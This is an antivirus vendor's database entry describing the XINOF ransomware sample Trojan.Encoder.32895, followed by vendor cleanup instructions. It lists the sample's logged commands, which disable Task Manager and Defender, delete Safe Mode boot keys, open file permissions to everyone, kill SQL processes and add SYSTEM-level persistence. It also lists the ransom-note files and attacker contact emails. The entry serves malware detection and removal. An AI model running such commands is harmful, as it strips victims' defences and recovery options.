Library
My library

+ Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets

Profile

Trojan.Encoder.32895

Added to the Dr.Web virus database: 2020-10-20

Virus description added:

Technical Information

To ensure autorun and distribution
Modifies the following registry keys
  • [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run] 'Michael Gillespie' = '%ALLUSERSPROFILE%\XINOF.exe'
  • [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Michael Gillespie' = '%ALLUSERSPROFILE%\XINOF.exe'
  • [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce] 'Michael Gillespie' = '%ALLUSERSPROFILE%\XINOF.exe'
  • [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] 'Michael Gillespie' = '%ALLUSERSPROFILE%\XINOF.exe'
Creates or modifies the following files
  • <SYSTEM32>\tasks\fonix
  • <SYSTEM32>\tasks\fonix11
  • <SYSTEM32>\tasks\fonix10
Creates the following files on removable media
  • <Drive name for removable media>:\how to decrypt files.hta
  • <Drive name for removable media>:\help.txt
  • <Drive name for removable media>:\cpriv.key
  • <Drive name for removable media>:\join.avi
  • <Drive name for removable media>:\dashborder_96.bmp
  • <Drive name for removable media>:\dashborder_144.bmp
  • <Drive name for removable media>:\dashborder_192.bmp
  • <Drive name for removable media>:\dialmap.bmp
  • <Drive name for removable media>:\default.bmp
  • <Drive name for removable media>:\coffee.bmp
  • <Drive name for removable media>:\sdksampleunprivdeveloper.cer
  • <Drive name for removable media>:\contoso.cer
  • <Drive name for removable media>:\testee.cer
  • <Drive name for removable media>:\testcertificate.cer
  • <Drive name for removable media>:\contoso_1.cer
  • <Drive name for removable media>:\hanni_umami_chapter.doc
Malicious functions
To complicate detection of its presence in the operating system,
blocks execution of the following system utilities:
  • Windows Task Manager (Taskmgr)
modifies the following system settings:
  • [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoClose' = '00000001'
  • [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'StartMenuLogOff' = '00000001'
Executes the following
  • '%WINDIR%\syswow64\taskkill.exe' /t /f /im sql*
Modifies file system
Creates the following files
  • %ALLUSERSPROFILE%\xinof.exe
  • C:\far2\addons\colors\custom_highlighting\how to decrypt files.hta
  • C:\far2\addons\colors\custom_highlighting\help.txt
  • C:\far2\addons\colors\custom_highlighting\cpriv.key
  • C:\far2\addons\colors\default_highlighting\how to decrypt files.hta
  • C:\far2\addons\colors\default_highlighting\help.txt
  • C:\far2\addons\colors\default_highlighting\cpriv.key
  • C:\far2\addons\macros\how to decrypt files.hta
  • C:\far2\addons\macros\help.txt
  • C:\far2\addons\macros\cpriv.key
  • C:\far2\addons\setup\how to decrypt files.hta
  • C:\far2\addons\setup\cpriv.key
  • C:\far2\documentation\help.txt
  • C:\far2\addons\shell\how to decrypt files.hta
  • C:\far2\addons\shell\help.txt
  • C:\far2\addons\shell\cpriv.key
  • C:\far2\addons\xlat\how to decrypt files.hta
  • C:\far2\addons\xlat\help.txt
  • C:\far2\addons\xlat\cpriv.key
  • C:\far2\addons\xlat\russian\how to decrypt files.hta
  • C:\far2\addons\xlat\russian\help.txt
  • C:\far2\addons\xlat\russian\cpriv.key
  • C:\far2\documentation\how to decrypt files.hta
  • C:\far2\addons\colors\cpriv.key
  • C:\far2\addons\setup\help.txt
  • C:\far2\addons\colors\help.txt
  • D:\help.txt
  • %ALLUSERSPROFILE%\microsoft\windows\start menu\programs\startup\xinof.exe
  • <Current directory>\cpriv.key
  • <Current directory>\cpub.key
  • %ALLUSERSPROFILE%\cpub.key
  • %ALLUSERSPROFILE%\cpriv.key
  • <Current directory>\systemid
  • %ALLUSERSPROFILE%\systemid
  • %ALLUSERSPROFILE%\how to decrypt files.hta
  • %ALLUSERSPROFILE%\help.txt
  • D:\how to decrypt files.hta
  • %ALLUSERSPROFILE%\microsoft\windows\start menu\programs\startup\how to decrypt files.hta
  • C:\far2\addons\cpriv.key
  • %ALLUSERSPROFILE%\microsoft\windows\start menu\programs\startup\help.txt
  • D:\cpriv.key
  • C:\how to decrypt files.hta
  • C:\help.txt
  • C:\cpriv.key
  • C:\far2\how to decrypt files.hta
  • C:\far2\help.txt
  • C:\far2\cpriv.key
  • C:\far2\addons\how to decrypt files.hta
  • C:\far2\addons\help.txt
  • C:\far2\addons\colors\how to decrypt files.hta
  • C:\far2\documentation\cpriv.key
Creates ransom message files (Trojan.Encoder).
Miscellaneous
Searches for the following windows
  • ClassName: '' WindowName: ''
Executes the following
  • '%WINDIR%\syswow64\cmd.exe' /c chcp 437
  • '%WINDIR%\syswow64\icacls.exe' * /grant Everyone:(OI)(CI)F /T /C /Q
  • '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v Manufacturer /t REG_SZ /d "XINOF Ransomware Version 3.3" /f
  • '%WINDIR%\syswow64\reg.exe' add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v Manufacturer /t REG_SZ /d "XINOF Ransomware Version 3.3" /f
  • '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v SupportHours /t REG_SZ /d "24 * 7 * 365" /f
  • '%WINDIR%\syswow64\reg.exe' add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v SupportHours /t REG_SZ /d "24 * 7 * 365" /f
  • '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v SupportPhone /t REG_SZ /d "contact us using this emails Kmira98einkm@cock.li mojagkrak9879@cock.l...
  • '%WINDIR%\syswow64\reg.exe' add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v SupportPhone /t REG_SZ /d "contact us using this emails Kmira98einkm@cock.li mojagkrak9879@cock.li " /f
  • '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticecaption /t REG_SZ /d "ALL Your Files Has Been Encrypted Using XINOF v4.2" /f
  • '%WINDIR%\syswow64\reg.exe' add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticecaption /t REG_SZ /d "ALL Your Files Has Been Encrypted Using XINOF v4.2" /f
  • '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d "All of your files encrypted. If want to recover your files contact ...
  • '%WINDIR%\syswow64\cmd.exe' /c Copy Cpub.key %ALLUSERSPROFILE%\Cpub.key
  • '%WINDIR%\syswow64\cmd.exe' /c Copy SystemID %ALLUSERSPROFILE%\SystemID
  • '%WINDIR%\syswow64\reg.exe' add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d "All of your files encrypted. If want to recover your files contact me by ...
  • '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
  • '%WINDIR%\syswow64\reg.exe' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
  • '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
  • '%WINDIR%\syswow64\reg.exe' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
  • '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  • '%WINDIR%\syswow64\reg.exe' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  • '%WINDIR%\syswow64\cmd.exe' /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  • '%WINDIR%\syswow64\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  • '%WINDIR%\syswow64\cmd.exe' /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
  • '%WINDIR%\syswow64\reg.exe' delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
  • '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
  • '%WINDIR%\syswow64\reg.exe' add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
  • '%WINDIR%\syswow64\cmd.exe' /c Copy Cpriv.key %ALLUSERSPROFILE%\Cpriv.key
  • '%WINDIR%\syswow64\cmd.exe' /c taskkill /t /f /im sql*
  • '%WINDIR%\syswow64\reg.exe' add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
  • '%WINDIR%\syswow64\cmd.exe' /c schtasks /CREATE /SC ONLOGON /TN fonix /TR %ALLUSERSPROFILE%\XINOF.exe /RU SYSTEM /RL HIGHEST /F
  • '%WINDIR%\syswow64\schtasks.exe' /CREATE /SC ONLOGON /TN fonix /TR %ALLUSERSPROFILE%\XINOF.exe /RU SYSTEM /RL HIGHEST /F
  • '%WINDIR%\syswow64\cmd.exe' /c copy %ALLUSERSPROFILE%\XINOF.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"
  • '%WINDIR%\syswow64\cmd.exe' /c copy %ALLUSERSPROFILE%\XINOF.exe "%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"
  • '%WINDIR%\syswow64\cmd.exe' /c schtasks /CREATE /SC ONLOGON /TN fonix /TR %ALLUSERSPROFILE%\XINOF.exe /F
  • '%WINDIR%\syswow64\schtasks.exe' /CREATE /SC ONLOGON /TN fonix /TR %ALLUSERSPROFILE%\XINOF.exe /F
  • '%WINDIR%\syswow64\cmd.exe' /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"
  • '%WINDIR%\syswow64\attrib.exe' +h +s "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"
  • '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d %ALLUSERSPROFILE%\XINOF.exe /f
  • '%WINDIR%\syswow64\reg.exe' add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d %ALLUSERSPROFILE%\XINOF.exe /f
  • '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d %ALLUSERSPROFILE%\XINOF.exe /f
  • '%WINDIR%\syswow64\chcp.com' 437
  • '%WINDIR%\syswow64\reg.exe' add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d %ALLUSERSPROFILE%\XINOF.exe /f
  • '%WINDIR%\syswow64\reg.exe' add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d %ALLUSERSPROFILE%\XINOF.exe /f
  • '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d %ALLUSERSPROFILE%\XINOF.exe /f
  • '%WINDIR%\syswow64\reg.exe' add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d %ALLUSERSPROFILE%\XINOF.exe /f
  • '%WINDIR%\syswow64\cmd.exe' /c schtasks /CREATE /SC ONLOGON /TN fonix11 /TR "<Full path to file>" /RU SYSTEM /RL HIGHEST /F
  • '%WINDIR%\syswow64\schtasks.exe' /CREATE /SC ONLOGON /TN fonix11 /TR "<Full path to file>" /RU SYSTEM /RL HIGHEST /F
  • '%WINDIR%\syswow64\cmd.exe' /c schtasks /CREATE /SC ONLOGON /TN fonix10 /TR "<Full path to file>" /F
  • '%WINDIR%\syswow64\schtasks.exe' /CREATE /SC ONLOGON /TN fonix10 /TR "<Full path to file>" /F
  • '%WINDIR%\syswow64\cmd.exe' /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
  • '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
  • '%WINDIR%\syswow64\cmd.exe' /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
  • '%WINDIR%\syswow64\cmd.exe' /c start cmd.exe /c taskkill /t /f /im sql*
  • '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d %ALLUSERSPROFILE%\XINOF.exe /f
  • '%WINDIR%\syswow64\cmd.exe' /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
  • '%WINDIR%\syswow64\reg.exe' delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk , mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Download Dr.Web

Download by serial number

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Download Dr.Web

Download by serial number

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android